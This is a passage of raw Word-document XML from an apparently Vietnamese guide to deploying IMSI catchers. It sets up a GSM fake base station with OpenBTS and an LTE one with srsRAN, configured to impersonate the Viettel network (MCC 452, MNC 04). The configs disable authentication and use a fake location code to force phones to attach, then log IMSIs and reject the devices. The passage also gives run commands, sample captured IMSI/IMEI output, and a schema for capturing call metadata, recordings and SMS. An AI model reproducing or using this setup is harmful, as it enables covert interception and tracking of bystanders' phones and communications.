        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── IMEI (15 digits, nếu thu được): 355260000000000</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── Timestamp: ISO8601</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── Signal strength (dBm): -67</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── Number of captured cells nearby: 3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── Call metadata (nếu Active MITM):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  │   ├── A-number (calling party)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  │   ├── B-number (called party)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  │   ├── Call duration</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  │   └── Audio file path (nếu ghi âm)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  └── SMS content (nếu relay qua A5/0 GSM)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="48"/>
    <w:bookmarkStart w:id="49" w:name="triển-khai-openbts-gsm-imsi-catcher"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.6 Triển Khai OpenBTS (GSM IMSI Catcher)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cài đặt:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Ubuntu 20.04 + USRP B210</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt install openbts openbts-uhd uhd-host</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Cấu hình OpenBTS (OpenBTS.conf)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[GSM]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Radio.Band</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> = GSM900</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Radio.C0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 60           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ARFCN (tần số channel 0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GSM.MCC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 452           </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Mã quốc gia Việt Nam</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GSM.MNC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 04            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># MNC Viettel</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GSM.LAC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 9999          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># LAC giả (khác với LAC thật → trigger Location Update)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GSM.CellID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GSM.BSIC.NCC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GSM.BSIC.BCC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Bật Identity Request cho tất cả UE</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SIP.Proxy.Registration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Disable authentication (GSM không bắt buộc auth mạng)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GSM.Authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Log IMSI (OpenBTS CLI):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenBTS&gt; tmsis</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">IMSI               TMSI       Old TMSI   Auth  IMEI               </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">452040123456789    0xA3B2C1D0 0x00000000 0     355260000000000    </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">452040987654321    0xB1C2D3E4 0x00000000 0     -                  </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="49"/>
    <w:bookmarkStart w:id="50" w:name="triển-khai-srsran-lte-imsi-catcher"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.7 Triển Khai srsRAN (LTE IMSI Catcher)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cài đặt:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> clone https://github.com/srsran/srsRAN_4G.git</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mkdir</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> srsRAN_4G/build </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> srsRAN_4G/build</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cmake</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> .. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-DCMAKE_BUILD_TYPE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Release</w:t>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sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> make install</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cấu hình eNodeB (enb.conf):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[enb]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">enb_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x19B</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mcc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">452</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mnc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">04</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mme_addr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 127.0.1.100</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">gtp_bind_addr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 127.0.1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">s1c_bind_addr </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 127.0.1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">n_prb </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 50              # 10 MHz bandwidth</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1                  # Transmission mode</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[rf]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">dl_earfcn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1301        # Band 3 (1805-1880 MHz downlink)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tx_gain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">80</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">rx_gain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">40</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">device_name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> UHD</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">device_args </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> type=b200,clock=gpsdo</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[log]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">all_level </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> info</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">filename </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp/enb.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cấu hình EPC giả (epc.conf) – để reject UE sau khi lấy IMSI:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[mme]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mme_code </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x01</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mme_group </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x0001</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tac </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0x0007</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mcc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">452</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mnc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">04</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Cấu hình để log IMSI rồi reject Attach:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[hss]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hss_hostname </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 127.0.1.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">db_name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp/ue_db.csv  # Log IMSI vào file</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[network]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Không cấp IP thật → UE timeout và kết nối lại mạng thật</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chạy:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Terminal 1: EPC giả</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> srsepc epc.conf</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Terminal 2: eNodeB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> srsenb enb.conf</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Theo dõi IMSI trong log</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
